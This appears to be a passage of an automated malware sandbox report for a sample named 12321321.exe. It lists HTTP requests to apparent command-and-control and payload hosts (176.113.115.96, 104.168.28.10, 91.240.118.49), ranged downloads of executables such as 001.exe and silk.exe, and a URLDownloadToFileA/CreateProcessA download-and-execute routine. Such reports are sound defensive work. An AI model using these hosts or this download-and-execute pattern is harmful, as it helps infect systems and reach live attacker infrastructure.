            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /001.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.28.10Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HEAD /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-983039User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=983040-1114111User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1245183User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1245184-1376255User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1376256-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-2097151User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2097152-2359295User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2359296-2621439User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2621440-2883583User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2883584-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4325375User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4325376-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5636095User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5636096-6160383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6160384-6684671User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6684672-6763823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00402C60 CreateProcessA,CloseHandle,CloseHandle,CloseHandle,URLDownloadToFileA,0_2_00402C60
            Source: global trafficHTTP traffic detected: GET /forsale/silk.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.240.118.49Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d493554dc9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
